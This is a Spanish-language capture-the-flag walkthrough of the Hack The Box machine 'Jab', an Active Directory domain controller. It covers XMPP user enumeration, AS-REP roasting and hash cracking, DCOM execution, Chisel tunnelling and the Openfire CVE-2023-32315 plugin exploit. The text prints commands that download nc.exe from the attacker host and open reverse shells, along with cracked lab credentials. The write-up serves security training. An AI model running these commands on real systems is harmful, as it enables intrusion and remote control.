Jab

OS: Windows
Dificultad: Medio
Puntos: 30

Nmap

nmap -v -p 22,8080 -sV -sC -oN nmap.txt 10.10.11.7
Nmap scan report for 10.10.11.4
Host is up (0.095s latency).
Not shown: 65499 closed tcp ports (reset)
PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-04-11 11:43:47Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
5222/tcp  open  jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     features: 
|     stream_id: 4f6t6n3tnc
|     unknown: 
|_    compression_methods: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5223/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|     capabilities: 
|     auth_mechanisms: 
|     features: 
|     errors: 
|       (timeout)
|     unknown: 
|_    compression_methods: 
5262/tcp  open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|     capabilities: 
|     auth_mechanisms: 
|     features: 
|     errors: 
|       (timeout)
|     unknown: 
|_    compression_methods: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     features: 
|     stream_id: a7l130js5g
|     unknown: 
|_    compression_methods: 
5276/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49779/tcp open  msrpc               Microsoft Windows RPC
64318/tcp open  msrpc               Microsoft Windows RPC

Enumeration

El puerto 7070 esta ejecutando el servicio Openfire.

Si nos dirigimos al link que esta en la pagina web podemos obtener informacion acerca de la tecnologia usada.

BOSH was originally developed in the Jabber/XMPP community as a replacement for an even earlier HTTP-based technology called Jabber HTTP Polling (XEP-0025) [9]. Although BOSH assumes that the “payload” of HTTP requests and responses will be XML, the payload formats are not limited to XMPP stanzas (see XMPP Core [10]) and could contain a mixture of elements qualified by namespaces defined by different protocols (e.g., both XMPP and JSON). BOSH connection managers are generally not required to understand anything about the XML content that they transport beyond perhaps ensuring that each XML payload is qualified by the correct namespace.

XMPP Client

Necesitamos un client XMPP para conectarnos al servidor por lo tanto usaremos pidgin.

apt install pidgin
pidgin

Una vez que tengamos el client podemos crearnos un usuario para acceder.

Registramos nuestro usuario y con eso ya estaremos autenticados en el servidor XMPP.

XMPP Enumeration

Enumerando el servidor encontramos 2 rooms. La ruta para encontrarlas es la siguiente:

Buddies -> Join a Chat -> Room List -> Find Rooms

Despues de checar todo a detalle solo podemos acceder a la test2 pero no contiene informacion relevante, sin embargo podemos obtener una lista de usuarios pero nos encontraremos con el detalle de que no los podemos copiar por lo tanto obtendremos esa informacion de la siguiente forma.

Accounts -> Search for Users -> Search Directory
Search : *

Antes de oprimir OK abriremos la debug console.

Help -> Debug Window

Ahora si oprimimos OK y veremos todo el query que hace en la consola.

Guardamos el output y lo tratamos de la siguiente forma para solo quedarnos con los usuarios.

cat purple-debug.log| sed 's/value>/\n/g' | cut -d '<' -f 1 | grep '@jab.htb' | cut -d '@' -f 1 | uniq > users.txt

ASREPRoast

Con la lista de usarios podemos tratar de obtener hashes a traves de kerberos.

impacket-GetNPUsers -usersfile users.txt jab.htb/ -dc-ip 10.10.11.4

Despues de unos minutos se obtuvieron 3 hashes de los usuarios.

jmontgomery
lbradford
mlowe

Crack Hash

Utilizando john solo pudimos obtener el password de un hash.

┌──(root㉿kali)-[~/htb/Jab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121     ($krb5asrep$23$jmontgomery@JAB.HTB)     
1g 0:00:00:13 DONE (2024-04-11 07:00) 0.07315g/s 1049Kp/s 2890Kc/s 2890KC/s !SkicA!..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Utilizamos ese usuario y password para conectarnos por XMPP y encontramos mas credenciales.

svc_openfire : !@#$%^&*(1qazxsw

Bloodhound Enumeration

Enumeramos el directorio activo con bloodhound para posteriormente analizarlo.

┌──(root㉿kali)-[~/htb/Jab]
└─# python3 /opt/BloodHound.py/bloodhound.py -c all -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -d jab.htb -dc DC01.jab.htb -ns 10.10.11.4
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.jab.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts

Analizando los privilegios que tiene el usuario svc_openfire podemos ver que tiene privilegios ExecuteDCOM.

DCOM Exec

Investigando sobre DCOM llegamos a varios blogs.

https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html
https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model
https://wadcoms.github.io/wadcoms/Impacket-DCOMExec/

Podemos obtener RCE de la siguiente forma.

impacket-dcomexec svc_openfire@10.10.11.4 'ping -n 1 10.10.14.105' -object MMC20 -nooutput

Obtenemos una reverse shell.

# Copiamos nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .

# Levantamos servidor web
python3 -m http.server 80

# Ejecutamos los comando para obtener la reverse shell
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'mkdir c:\temp' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'curl 10.10.14.105/nc.exe -o c:\temp\nc.exe' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'c:\temp\nc.exe 10.10.14.105 1234 -e cmd.exe' -object MMC20 -nooutput
┌──(root㉿kali)-[~/htb/Jab]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.105] from (UNKNOWN) [10.10.11.4] 50235
Microsoft Windows [Version 10.0.17763.5458]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32>whoami
whoami
jab\svc_openfire

Privilege Escalation

Ya que estamos dentro de la maquina identificamos que hay un par de puertos locales abiertos que estan relacionados con Openfire.

C:\windows\system32>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2620
  TCP    127.0.0.1:389          127.0.0.1:49773        ESTABLISHED     644
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       1268
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       1268

Port Forwarding

Haremos un portforward para acceder a ese puerto con chisel. Descargamos el programa en la maquina.

python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe

Creamos el tunel de la siguiente forma.

┌──(root㉿kali)-[~/htb/Jab]
└─# /opt/linux/chisel server -p 5555 --reverse 
2024/04/12 01:10:05 server: Reverse tunnelling enabled
2024/04/12 01:10:05 server: Fingerprint RwtpW0NzHQeIOhAYQTZz7Q8soOlr7aawPPFHw9pkx4I=
2024/04/12 01:10:05 server: Listening on http://0.0.0.0:5555
c:\temp>chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090    
chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
2024/04/12 04:11:13 client: Connecting to ws://10.10.14.105:5555
2024/04/12 04:11:13 client: Connected (Latency 101.4635ms)

Ahora podemos acceder al portal.

Openfire Remote Code Execution

Utilizando las credenciales del usuario svc_openfire podemos acceder al portal.

En nuestra investigacion del inicio relacionado con Openfire identificamos que podemos obtener RCE como lo mencionan los siguientes recursos.

https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT

Primero descargaremos el plugin openfire-management-tool-plugin.jar y lo subimos en el apartado de plugins.

Una vez que se suba el plugin iremos al apartado de Server Settings y seleccionaremos la opcion Management Tool.

Nos pedira el password que es 123 y accederemos correctamente. Posteriormente seleccionaremos la opcion system command para poder ejecutar comandos.

Obtenemos una reverse shell y finalizamos.

c:\temp\nc.exe 10.10.14.105 4444 -e cmd.exe